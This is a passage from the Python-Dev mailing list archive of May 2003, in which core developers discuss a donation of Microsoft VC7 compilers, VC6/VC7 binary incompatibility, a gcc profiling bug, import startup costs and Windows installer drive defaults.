 <200305061948.03757.phil@riverbankcomputing.co.uk>
References: <200305061826.h46IQ7605750@odiug.zope.com>
 <200305061948.03757.phil@riverbankcomputing.co.uk>
Message-ID: <200305061855.h46ItFZ06217@odiug.zope.com>

> How do we get hold of the free VC 7 compilers?

Here's the info Nick sent me:

| We offer as part of the .NET Framework SDK each of the compilers that
| comprise our Visual Studio tool - including C++.  The caveat here is
| that we don't yet ship the full CRT or STL with this distribution -
| this will be changing.  Also, the 64bit C++ compilers ship for free as
| part of the Windows Platform SDK.  All of this is available on
| msdn.microsoft.com.
[...]
| Here are the links to the SDKs.  But so you aren't surprised, these are
| NOT low-overhead downloads or installs...
| 
| .NET Framework 1.1
| 
| http://www.msdn.microsoft.com/netframework/downloads/howtoget.aspx
| 
| Platform SDK
| 
| http://msdn.microsoft.com/library/default.asp?url=/library/en-us/sdkintro/sdkintro/obtaining_the_complete_sdk.asp

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Tue May  6 19:56:52 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 14:56:52 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061948.03757.phil@riverbankcomputing.co.uk>
Message-ID: <BIEJKCLHCIOIHAGOKOLHCEIAFJAA.tim.one@comcast.net>

[Phil Thompson]
> How do we get hold of the free VC 7 compilers?

Part of the 100+ MB .NET Framework 1.1 SDK:

http://www.msdn.microsoft.com/netframework/downloads/howtoget.aspx

Note that this requires Win2K minimum.


From jepler@unpythonic.net  Tue May  6 19:57:50 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Tue, 6 May 2003 13:57:50 -0500
Subject: RedHat 9 _random failure under -pg (was Re: [Python-Dev] Startup time)
Message-ID: <20030506185750.GB27125@unpythonic.net>

On Tue, May 06, 2003 at 01:36:00PM -0500, Jeff Epler wrote:
> (gdb) run -c "import random"
> Starting program: /usr/src/Python-2.3b1/python -c "import random"
> [New Thread 1074963072 (LWP 28408)]
> 
> Program received signal SIGILL, Illegal instruction.
> [Switching to Thread 1074963072 (LWP 28408)]
> 0x08109aa0 in subtype_getsets_full ()
> (gdb) where
> #0  0x08109aa0 in subtype_getsets_full ()
> #1  0x4001c743 in random_new (type=0x4001c738, args=0x4012c02c, kwds=0x0)
>                at /usr/src/Python-2.3b1/Modules/_randommodule.c:439
> (gdb) ptype subtype_getsets_full
> type = struct PyGetSetDef {
> [...]

gcc is generating plainly bogus code for this simple function
random_new:
00001738 <random_new>:
    1738:       55                      push   %ebp
    1739:       89 e5                   mov    %esp,%ebp
    173b:       56                      push   %esi
    173c:       53                      push   %ebx
    173d:       ff 93 7c 00 00 00       call   *0x7c(%ebx)

(for those of you who don't read x86 assembly, the first 4 functions
are part of a standard function prologue.  The fifth instruction is
a call through a function pointer, but the register's value at this
point is undefined.  This is not the call to type->tp_alloc(), correct
code for that is just below)

Well, this may have been false alarm -- when I removed -pg from OPT in
the Makefile, './python -c "import random"' works.  So this is a problem
only when profiling is enabled.  Is this intended to work?

In any case, the fact that the disassembly is so plainly bogus tends to
imply that this is a gcc bug, not anything that Python can fix.

Jeff


From just@letterror.com  Tue May  6 19:59:02 2003
From: just@letterror.com (Just van Rossum)
Date: Tue,  6 May 2003 20:59:02 +0200
Subject: [Python-Dev] Startup time
In-Reply-To: <20030506183721.GC1340@epoch.metaslash.com>
Message-ID: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>

Neal Norwitz wrote:

> I think amny of the extra stat/open calls are due to zipimports.
> 
> I don't have python23.zip, but it's still looking for a bunch
> of extra files that can't exist (in python23.zip).  Perhaps
> if the zip file doesn't exist, we can short circuit the remaining
> calls to open()?

I think we should, although I wouldn't know off hand how to do that.

There's still some nice-to-have PEP302 stuff that remains to be
implemented, that could actually help solve this problem. Currently
there are no real importer objects for the builting import mechanisms: a
value of None for a path item in sys.path_importer_cache means: use the
builtin importer. If there _was_ a true builtin importer object, None
could mean: no importer can handle this path item, skip it. See also
python.org/sf/692884. I hope to be able to work on this before 2.3b2.

> stat64("/home/neal/local/lib/python23.zip/warnings", 0xbfffebc0) = -1
ENOENT (No such file or 
> directory)
> open("/home/neal/local/lib/python23.zip/warnings.so",
O_RDONLY|O_LARGEFILE) = -1 ENOENT (No 
> such file or directory)
> open("/home/neal/local/lib/python23.zip/warningsmodule.so",
O_RDONLY|O_LARGEFILE) = -1 ENOENT 
> (No such file or directory)
> open("/home/neal/local/lib/python23.zip/warnings.py",
O_RDONLY|O_LARGEFILE) = -1 ENOENT (No 
> such file or directory)
> open("/home/neal/local/lib/python23.zip/warnings.pyc",
O_RDONLY|O_LARGEFILE) = -1 ENOENT (No 
> such file or directory)

You could try editing site.py so it (as it used to) removes path items
that don't exist on the file system. Except this probably only helps if
you'd do this _before_ os.py is imported, as os.py pulls in quite a few
modules. Hm, chicken and egg... Or disable to the code that adds the
zipfile to sys.path in Modules/getpath.c, and compare the number of stat
calls.

Just


From tim@zope.com  Tue May  6 20:00:03 2003
From: tim@zope.com (Tim Peters)
Date: Tue, 6 May 2003 15:00:03 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEIAFJAA.tim@zope.com>

[logistix]
> ...
> Also, I'm assuming 2.3 will still be compiled on 6.0, right?

The PythonLabs 2.3 Windows distribution will be compiled with MSVC 6,
barring an unbroken chain of miracles.



From guido@python.org  Tue May  6 20:01:01 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 06 May 2003 15:01:01 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: Your message of "Tue, 06 May 2003 13:52:32 CDT."
 <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net>
References: <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net>
Message-ID: <200305061901.h46J11306259@odiug.zope.com>

> Visual Studio 2003 came out a few weeks ago.  I honestly don't know if 
> its considered VC8 or just VC7.1 with the same backend compilers.  But if 
> you're going to upgrad, you might as well go all the way.

Good question.

> Also, I'm assuming 2.3 will still be compiled on 6.0, right?

Hm, I was thinking that 2.3 final could be built using 7.x if Nick can
get us the donated copies fast enough.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Tue May  6 20:12:13 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 14:12:13 -0500
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061901.h46J11306259@odiug.zope.com>
References: <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net>
 <200305061901.h46J11306259@odiug.zope.com>
Message-ID: <16056.2317.124886.963460@montanaro.dyndns.org>

    >> Also, I'm assuming 2.3 will still be compiled on 6.0, right?

    Guido> Hm, I was thinking that 2.3 final could be built using 7.x if
    Guido> Nick can get us the donated copies fast enough.

I can see the downside (next to no experience with 7.x, and perhaps none
before the final release).  What's the upside?

Skip



From skip@pobox.com  Tue May  6 20:18:24 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 14:18:24 -0500
Subject: [Python-Dev] pyconfig.h not regenerated by "config.status
 --recheck"
In-Reply-To: <m3znm06kl2.fsf@mira.informatik.hu-berlin.de>
References: <16055.57554.364845.689049@montanaro.dyndns.org>
 <m3znm06kl2.fsf@mira.informatik.hu-berlin.de>
Message-ID: <16056.2688.72423.251200@montanaro.dyndns.org>

    >> This generated pyconfig.h.  It would thus appear that config.status
    >> shouldn't be used by developers.  Apparently one of the other flags
    >> it appends to the generated configure command suppresses generation
    >> of pyconfig.h (and maybe other files).

    Martin> Can you find out whether this is related to the fact that you
    Martin> are building in a separate build directory?

I just confirmed that it's not related to the separate build directory.
When you run config.status --recheck it reruns your latest configure command
with the extra flags --no-create and --no-recursion.  Without rummaging
around in the configure file my guess is the --no-create flag is the
culprit.  

So, a word to the wise: avoid config.status --recheck.

Skip


From tim.one@comcast.net  Tue May  6 20:17:28 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 15:17:28 -0400
Subject: [Python-Dev] Windows installer request...
In-Reply-To: <60FB8BB7F0EFC7409B75EEEC13E20192022DE23A@admin56.narex.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHMEICFJAA.tim.one@comcast.net>

[Bjorn Pettersen]
> Most installers default to the system drive, so I didn't even look the
> first time. I am able to change it manually.
> ...
> It should be as easy as (platforms that doesn't have %systemdrive% could
> only install to C:):
>
>  item: Get Environment Variable
>    Variable=OSDRIVE
>    Environment=SystemDrive
>    Default=C:
>  end
>
> However, you might have to do
>
>  item: Get Registry Key Value
>    Variable=OSDRIVE
>    Key=System\CurrentControlSet\Control\Session Manager\Environment
>    Value Name=SystemDrive
>    Flags=00000100
>    Defualt=C:
>  end
>
> (not sure about the Flags parameter) I couldn't find much documentation,
> and the example I'm looking at is a litte "divided" about which it
> should use... I think it tries the first one, and falls back on the
> second(?) (http://ibinstall.defined.net/dl_scripts.htm,
> script_6016.zip/IBWin32Setup.wse).
>
> Also, it looks like you want to use %SYS32% to get to the windows system
> directory (on WinXP, it's c:\windows\system32, which doesn't seem to be
> listed anywhere...)

Enough already <wink/frown>:  I don't have time to try umpteen different
things here, or really even one.

What I did do is build an installer *just* removing the hard-coded
Wizard-generated "C:" prefix.  Martin tried that and said it worked for him.
It doesn't hurt me.  If it works for you too, I'll commit the change:

    ftp://ftp.python.org/pub/tmp/experimental.exe

Please give that a try.  It's an incoherent mix if files, so please use a
junk name for the installation directory and program startup group (or
simply abort the install after you see whether it suggested a drive you
approve of).

> I can't figure out how you're building the installer however. If you can
> point me in the right direction I can test it on my special WinXP,
> regular WinXP, Win98, Win2k, and maybe WinNT4 (I think we still have one
> around :-).

.wse files aren't intended to be edited by hand (although we all do,
sometimes).  Instead, they're input to Wise's commercial GUI, which displays
their contents in a nice block-indented, color-coded way.  "flags" aren't
documented, and the GUI never shows them to you -- they correspond to the
on/off status of various checkboxes in various GUI dialogs.  We use Wise
8.14 to build the installer.  If you have Wise, you open the python20.wse
file using it, and click the "Compile" button in the GUI.  If you don't have
Wise, I suppose you guess what Wise would do if you did have it <wink>.



From brian@sweetapp.com  Tue May  6 20:24:31 2003
From: brian@sweetapp.com (Brian Quinlan)
Date: Tue, 06 May 2003 12:24:31 -0700
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <16056.2317.124886.963460@montanaro.dyndns.org>
Message-ID: <007e01c31405$1ea52fc0$21795418@dell1700>

> I can see the downside (next to no experience with 7.x, and perhaps
none
> before the final release).  What's the upside?

It's free and more standards compliant. 

Cheers,
Brian



From martin@v.loewis.de  Tue May  6 20:21:41 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 06 May 2003 21:21:41 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061826.h46IQ7605750@odiug.zope.com>
References: <200305061826.h46IQ7605750@odiug.zope.com>
Message-ID: <m3ptmv6fui.fsf@mira.informatik.hu-berlin.de>

Guido van Rossum <guido@python.org> writes:

> More recently, Nick sent me an email offering to donate copies of VC 7
> to the "key developers".  I count Tim, myself and Mark Hammond among
> the key developers.  Is there anyone else who would count themselves
> among those?

Does he already have the copies, or would purchase them/donate the
money?

> If you think this is a bad idea or if you would like to qualify for a
> compiler donation, please follow up!

If the money isn't spent yet, I think it would be better spent for
copies of VC 7.1 (aka .NET 2003). Reportedly, this compiler fixes a
number of bugs of the 7.0 release, i.e. it crashes less frequently.
I'm still uncertain what the binary compatibility issues are, but I
have reason to assume that 7.0 and 7.1 are binary compatible.

Before getting multiple copies of the compiler, you should double
check that you can actually produce a Windows installer for that
compiler. Notice that there is a particular problem hidden here:

You will have to ship the C runtime (MSVCR7.DLL) with the
installer. However, Microsoft does *not* give you permission to
include the DLL file. Instead, they provide a Windows installer
snippet which you must "use" (I believe in the sense of "execute on
the target machine"). The installer snippet will check for versions,
deal with DLL caches, etc. Microsoft has procedure for combining
installer snippets into full installer files. They acknowledge the
existance of other tools that make installable binaries, but mandate
that these tools perform the same procedures. So you should check
whether your copy of Wise can deal with these issues.

If you find it could actually work, I'm +0 on accepting the donation
(though I won't need a copy myself). You have to switch sooner or
later, anyway, so you might as well switch now instead of later.  The
advantage I see for Python itself is that IPv6 would now work on
Windows. The disadvantage I see is that distutils would need to get
updated.

If you think that 2.3 won't be built with 7.x anyway, you might as
well reject the donation, and hope the donor will still be there to
offer VC 7.2/8.0.

Regards,
Martin


From tim.one@comcast.net  Tue May  6 20:20:34 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 15:20:34 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061901.h46J11306259@odiug.zope.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHCEIEFJAA.tim.one@comcast.net>

[Guido]
> Hm, I was thinking that 2.3 final could be built using 7.x if Nick can
> get us the donated copies fast enough.

As I said, the PythonLabs Windows 2.3 installer will be compiled using MSVC
6, barring an unbroken chain of miracles <wink>.



From martin@v.loewis.de  Tue May  6 20:25:20 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 06 May 2003 21:25:20 +0200
Subject: RedHat 9 _random failure under -pg (was Re: [Python-Dev] Startup time)
In-Reply-To: <20030506185750.GB27125@unpythonic.net>
References: <20030506185750.GB27125@unpythonic.net>
Message-ID: <m3llxj6fof.fsf@mira.informatik.hu-berlin.de>

Jeff Epler <jepler@unpythonic.net> writes:

> Well, this may have been false alarm -- when I removed -pg from OPT in
> the Makefile, './python -c "import random"' works.  So this is a problem
> only when profiling is enabled.  Is this intended to work?

You mean, is the gcc option -pg supposed to work? As a Python
developer: How am I supposed to know? As a gcc developer: yes,
certainly.

> In any case, the fact that the disassembly is so plainly bogus tends to
> imply that this is a gcc bug, not anything that Python can fix.

That seems to be the case, yes. Python can only work-around, but in
this case, the work-around seems trivial.

Regards,
Martin



From gtalvola@nameconnector.com  Tue May  6 20:27:11 2003
From: gtalvola@nameconnector.com (Geoffrey Talvola)
Date: Tue, 6 May 2003 15:27:11 -0400
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <61957B071FF421419E567A28A45C7FE59AF419@mailbox.nameconnector.com>

Guido van Rossum wrote:
> I can see advantages and disadvantages of moving to VC 7; I'm sure the
> VC 7 compiler is more standard-compliant and generates faster code,
> but a disadvantage is that you can't apparently link binaries built
> with VC 6 to a program built with VC 7, meaning that 3rd party
> extensions will have to be recompiled with VC 7 as well.

If that's really true then my vote would be against switching to VC 7.

My company uses VC 6 extensively and we have no plans to upgrade to VC 7.
Our Python programs make extensive use of .pyd's compiled with VC6, and we
also embed the Python interpreter within our C++ programs.  It would be
_very_ painful for us to upgrade our world to VC7, and if Python switched to
VC 7, we'd probably be forced to simply compile our own custom version of
Python (and the 3rd-party extension DLLs we use) with VC6.

So there's one data point for you...

- Geoff


From skip@pobox.com  Tue May  6 20:31:16 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 14:31:16 -0500
Subject: [Python-Dev] SF CVS offline
Message-ID: <16056.3460.431223.466945@montanaro.dyndns.org>

It appears SF CVS is offline (as of 2:30PM Central Daylight Time).  I
noticed this when I was prompted for a CVS password for the first time in
ages (and which I can't remember).  I went poking around for help and came
across this page:

    http://sourceforge.net/docman/display_doc.php?docid=2352&group_id=1

which says, in part:

    Project CVS Services:    Offline; unplanned maintenance (follow-up from
                             2003-05-05) in-progress 

FYI.

Skip


From skip@pobox.com  Tue May  6 20:33:22 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 14:33:22 -0500
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <007e01c31405$1ea52fc0$21795418@dell1700>
References: <16056.2317.124886.963460@montanaro.dyndns.org>
 <007e01c31405$1ea52fc0$21795418@dell1700>
Message-ID: <16056.3586.553248.689395@montanaro.dyndns.org>

    >> I can see the downside (next to no experience with 7.x, and perhaps
    >> none before the final release).  What's the upside?

    Brian> It's free and more standards compliant. 

Then I suggest we have at least one beta which is built using it.

Skip



From brian@sweetapp.com  Tue May  6 20:53:56 2003
From: brian@sweetapp.com (Brian Quinlan)
Date: Tue, 06 May 2003 12:53:56 -0700
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <16056.3586.553248.689395@montanaro.dyndns.org>
Message-ID: <007f01c31409$3a5f9670$21795418@dell1700>

Brian> It's free and more standards compliant.
> 
> Then I suggest we have at least one beta which is built using it.

To get me wrong; I think that moving to VC7 for Python 2.3 would be
mistake if VC6 compiled extension modules are not binary compatible. My
understanding was that static libraries are not compatible but that
dynamic ones are. I spent a few minutes with google but wasn't able to
find out.

Assuming that VC6 and VC7 are not binary compatible, here are my
concerns:

1. 3rd party extension developers will have to switch very quickly to be

   ready for the 2.3 release
2. Some 3rd party extension developers may have already released 
   binaries for Python 2.3, based on the understanding that there won't 
   be any additional API changes after the first beta (baring a 
   disaster). 
3. I believe that the installer normally preserves site-packages when
   doing an upgrade? If so, the user is going to be left with extension
   modules that won't work.

Cheers,
Brian



From fdrake@acm.org  Tue May  6 20:57:04 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Tue, 6 May 2003 15:57:04 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <007f01c31409$3a5f9670$21795418@dell1700>
References: <16056.3586.553248.689395@montanaro.dyndns.org>
 <007f01c31409$3a5f9670$21795418@dell1700>
Message-ID: <16056.5008.75631.677019@grendel.zope.com>

Brian Quinlan writes:
 > 1. 3rd party extension developers will have to switch very quickly to be
 >    ready for the 2.3 release

A very real issue, to be sure.

 > 2. Some 3rd party extension developers may have already released 
 >    binaries for Python 2.3, based on the understanding that there won't 
 >    be any additional API changes after the first beta (baring a 
 >    disaster). 

I'm not convinced that's a huge problem, though it could be an
annoyance.

 > 3. I believe that the installer normally preserves site-packages when
 >    doing an upgrade? If so, the user is going to be left with extension
 >    modules that won't work.

Yes, but site-packages is specific to the major.minor version of
Python, so it would only bite people going from an alpha/beta to a
final release, not from major.minor-1.  Is this really an issue?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From pje@telecommunity.com  Tue May  6 20:58:34 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Tue, 06 May 2003 15:58:34 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061845.h46Ijo106044@odiug.zope.com>
References: <Your message of "Tue, 06 May 2003 11:41:07 PDT." <20030506184107.GA21470@glacier.arctrix.com>
 <200305061826.h46IQ7605750@odiug.zope.com>
 <20030506184107.GA21470@glacier.arctrix.com>
Message-ID: <5.1.1.6.0.20030506155456.01f9c220@telecommunity.com>

At 02:45 PM 5/6/03 -0400, Guido van Rossum wrote:

> > Also, does this affect whether extensions can be compiled by Mingw?
> > It would be nice if people could continue building extensions on
> > Windows using free tools.
>
>I know noting about Mingw.  Anyone who does please speak up if this
>would affect them or not.

I build my extensions on Windows 98 with MinGW.  I don't know if VC6 vs. 
VC7 makes a difference or not, since I don't own either one.

I think someone said something about the free VC7 requiring Win2K?  That 
seems to me like a dealbreaker for switching from MinGW to VC7, even if the 
VC7 is free-as-in-beer.



From skip@pobox.com  Tue May  6 21:01:51 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 15:01:51 -0500
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <007f01c31409$3a5f9670$21795418@dell1700>
References: <16056.3586.553248.689395@montanaro.dyndns.org>
 <007f01c31409$3a5f9670$21795418@dell1700>
Message-ID: <16056.5295.907462.399304@montanaro.dyndns.org>

    Brian> Assuming that VC6 and VC7 are not binary compatible, here are my
    Brian> concerns:
    ...

Sounds to me like the switch to VC7 will have to happen with a long lead
time, similar to what one might expect if Guido decided to deprecate the sys
module. ;-)

Skip


From aleax@aleax.it  Tue May  6 21:12:07 2003
From: aleax@aleax.it (Alex Martelli)
Date: Tue, 6 May 2003 22:12:07 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <007f01c31409$3a5f9670$21795418@dell1700>
References: <007f01c31409$3a5f9670$21795418@dell1700>
Message-ID: <200305062212.07539.aleax@aleax.it>

On Tuesday 06 May 2003 09:53 pm, Brian Quinlan wrote:
> Brian> It's free and more standards compliant.
>
> > Then I suggest we have at least one beta which is built using it.
>
> To get me wrong; I think that moving to VC7 for Python 2.3 would be
> mistake if VC6 compiled extension modules are not binary compatible. My
> understanding was that static libraries are not compatible but that
> dynamic ones are. I spent a few minutes with google but wasn't able to
> find out.

When we discussed VC versions (back when we met in Ofxord during
PythonUK/ACCU), David Abrahams seemed adamant that VC7 and VC6
are indeed compatible -- as he has first-hand experience while I just have
horror stories from ex-coworkers I suspect he's likelier to be right.  Anyway,
I'm CC'ing him since I do suspect he has relevant input and might not
be following python-dev right now...


Alex



From martin@v.loewis.de  Tue May  6 21:22:26 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Tue, 06 May 2003 22:22:26 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <007f01c31409$3a5f9670$21795418@dell1700>
References: <007f01c31409$3a5f9670$21795418@dell1700>
Message-ID: <3EB81982.8070600@v.loewis.de>

Brian Quinlan wrote:
> To get me wrong; I think that moving to VC7 for Python 2.3 would be
> mistake if VC6 compiled extension modules are not binary compatible. My
> understanding was that static libraries are not compatible but that
> dynamic ones are. I spent a few minutes with google but wasn't able to
> find out.

Please rest assured that they are definitely incompatible. People have
been trying to combine VC7 extension modules with VC6, and got 
consistent crashes. The crashes occur as you pass FILE* across 
libraries: Neither C library can deal with FILE* (such as stdout)
received from the other library.

> 1. 3rd party extension developers will have to switch very quickly to be
> 
>    ready for the 2.3 release

True.

> 2. Some 3rd party extension developers may have already released 
>    binaries for Python 2.3, based on the understanding that there won't 
>    be any additional API changes after the first beta (baring a 
>    disaster). 

There won't be any. That's any ABI change.

> 3. I believe that the installer normally preserves site-packages when
>    doing an upgrade? If so, the user is going to be left with extension
>    modules that won't work.

Users installing betas should still expect such things. Uninstallation
before upgrading to the final release is strongly advised.

Regards,
Martin



From guido@python.org  Tue May  6 21:23:18 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 06 May 2003 16:23:18 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: Your message of "Tue, 06 May 2003 22:12:07 +0200."
 <200305062212.07539.aleax@aleax.it>
References: <007f01c31409$3a5f9670$21795418@dell1700>
 <200305062212.07539.aleax@aleax.it>
Message-ID: <200305062023.h46KNI907721@odiug.zope.com>

I should mention that on re-reading Nick's email, it's clear that he's
offering to donate copies of Visual C++ 2003, so that's the latest.
I've invited him to respond directly to the comments and questions.

In any case, it looks like it may be best to wait until after 2.3 is
released, although if there's time I wouldn't mind playing a bit with
2003.  (Hmm... if it really doesn't work on Win98 I have a problem.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin@v.loewis.de  Tue May  6 21:26:51 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Tue, 06 May 2003 22:26:51 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305062212.07539.aleax@aleax.it>
References: <007f01c31409$3a5f9670$21795418@dell1700> <200305062212.07539.aleax@aleax.it>
Message-ID: <3EB81A8B.9090603@v.loewis.de>

Alex Martelli wrote:

> When we discussed VC versions (back when we met in Ofxord during
> PythonUK/ACCU), David Abrahams seemed adamant that VC7 and VC6
> are indeed compatible

I doubt he said this in this generality: he surely knows that you
cannot mix C++ objects files on the object file level between those
compilers, as they implement completely different ABIs.

For Python, the biggest problem is that you cannot pass FILE* from one C 
library to the other, because of some stupid locking test in the C 
library. This does cause crashes when you try to use Python extension 
modules compiled with the wrong compiler.

Regards,
Martin



From aleax@aleax.it  Tue May  6 21:34:12 2003
From: aleax@aleax.it (Alex Martelli)
Date: Tue, 6 May 2003 22:34:12 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305062023.h46KNI907721@odiug.zope.com>
References: <007f01c31409$3a5f9670$21795418@dell1700> <200305062212.07539.aleax@aleax.it> <200305062023.h46KNI907721@odiug.zope.com>
Message-ID: <200305062234.12363.aleax@aleax.it>

On Tuesday 06 May 2003 10:23 pm, Guido van Rossum wrote:
> I should mention that on re-reading Nick's email, it's clear that he's
> offering to donate copies of Visual C++ 2003, so that's the latest.
> I've invited him to respond directly to the comments and questions.
>
> In any case, it looks like it may be best to wait until after 2.3 is
> released, although if there's time I wouldn't mind playing a bit with
> 2003.  (Hmm... if it really doesn't work on Win98 I have a problem.)

Me too -- a BAD one, since I do just about all of my "windows" work
these days with win4lin under Linux on my desktop box (cheap, fast,
convenient), or on an old Acer Travelmate 345T laptop, and both only
support Win98 -- the only "modern" Windows version I have around is
in the dualboot of a far-too-heavy Dell laptop which came with Win/XP
(so I didn't entirely remove it when installing Linux as the main OS, just
shrank it as much as I could in case I ever needed something in it)...

It WOULD be deucedly inconvenient to have to install Win/XP and keep
it booted just to be able to build Python extension binaries for Windows...!-(

Why a command-line compiler shouldn't be able to run on just about any
version of its OS really escapes me.  Maybe a clever move to force us
laggards to upgrade whether we want to or not...?-(


Alex



From skip@pobox.com  Tue May  6 21:50:31 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 15:50:31 -0500
Subject: [Python-Dev] bsddb185 module changes checked in
Message-ID: <16056.8215.274307.904009@montanaro.dyndns.org>

The various bits necessary to implement the "build bsddb185 when
appropriate" have been checked in.  I'm pretty sure I don't have the best
possible test for the existence of a db library, but it will have to do for
now.  I suspect others can clean it up later during the beta cycle.  The
current detection code in setup.py should work for Nick on OSF/1 and for
platforms which don't require a separate db library.

I'd appreciate some extra pounding on this code.

Thanks,

Skip


From tim.one@comcast.net  Tue May  6 21:50:18 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 16:50:18 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB81A8B.9090603@v.loewis.de>
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEIPFJAA.tim.one@comcast.net>

[Alex Martelli]
> When we discussed VC versions (back when we met in Ofxord during
> PythonUK/ACCU), David Abrahams seemed adamant that VC7 and VC6
> are indeed compatible

[Martin v. Lowis]
> I doubt he said this in this generality: he surely knows that you
> cannot mix C++ objects files on the object file level between those
> compilers, as they implement completely different ABIs.
>
> For Python, the biggest problem is that you cannot pass FILE* from one C
> library to the other, because of some stupid locking test in the C
> library. This does cause crashes when you try to use Python extension
> modules compiled with the wrong compiler.

And not the only problem.  Review the "PyObject_New vs PyObject_NEW" thread
from python-dev in March.  This snippet sums it up:

    [David Abrahams]
    > Python was compiled with vc6, the rest with vc7.  I test this
    > combination regularly and have never seen a problem.

    [Tim]
    You have now <wink>.



From brian@sweetapp.com  Tue May  6 22:15:35 2003
From: brian@sweetapp.com (Brian Quinlan)
Date: Tue, 06 May 2003 14:15:35 -0700
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB81982.8070600@v.loewis.de>
Message-ID: <008601c31414$a26d0120$21795418@dell1700>

> Please rest assured that they are definitely incompatible. People have
> been trying to combine VC7 extension modules with VC6, and got
> consistent crashes. The crashes occur as you pass FILE* across
> libraries: Neither C library can deal with FILE* (such as stdout)
> received from the other library.

Wouldn't this only affect extension modules using PyFile_FromFile and
PyFile_AsFile? And a little hackery could make those routines generate
exceptions if called from an incompatible VC version.

> > 2. Some 3rd party extension developers may have already released
> >    binaries for Python 2.3, based on the understanding that there 
> >    won't be any additional API changes after the first beta (baring
> >    a disaster).
> 
> There won't be any. That's any ABI change.

Isn't the ABI dependant on the API and linker? The API is supposed to be
stable at this point. I would imagine that most extension developers
would assume that the build environment is also stable at this point.

Cheers,
Brian



From jepler@unpythonic.net  Tue May  6 21:57:33 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Tue, 6 May 2003 15:57:33 -0500
Subject: RedHat 9 _random failure under -pg (was Re: [Python-Dev] Startup time)
In-Reply-To: <m3llxj6fof.fsf@mira.informatik.hu-berlin.de>
References: <20030506185750.GB27125@unpythonic.net> <m3llxj6fof.fsf@mira.informatik.hu-berlin.de>
Message-ID: <20030506205733.GE27125@unpythonic.net>

On Tue, May 06, 2003 at 09:25:20PM +0200, Martin v. L=F6wis wrote:
> Jeff Epler <jepler@unpythonic.net> writes:
>=20
> > Well, this may have been false alarm -- when I removed -pg from OPT i=
n
> > the Makefile, './python -c "import random"' works.  So this is a prob=
lem
> > only when profiling is enabled.  Is this intended to work?
>=20
> You mean, is the gcc option -pg supposed to work? As a Python
> developer: How am I supposed to know? As a gcc developer: yes,
> certainly.

I didn't know you were a gcc developer.

In any case, I've distilled this down to a small testcase and was working
on preparing a bug report for their gnats database.  The testcase is
about as simple as it gets:
    /* compile with -pg -fPIC -O */
    typedef struct { void *(*f)(void *, int); } T;
    void *g(T *t) { return t->f(t, 0); }
however, I checked 3.2.3 and this bug is fixed, so I guess I don't need
to do that.

Jeff


From lists@morpheus.demon.co.uk  Tue May  6 22:19:31 2003
From: lists@morpheus.demon.co.uk (Paul Moore)
Date: Tue, 06 May 2003 22:19:31 +0100
Subject: [Python-Dev] MS VC 7 offer
References: <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net> <200305061901.h46J11306259@odiug.zope.com>
Message-ID: <n2m-g.ptmvn57g.fsf@morpheus.demon.co.uk>

Guido van Rossum <guido@python.org> writes:

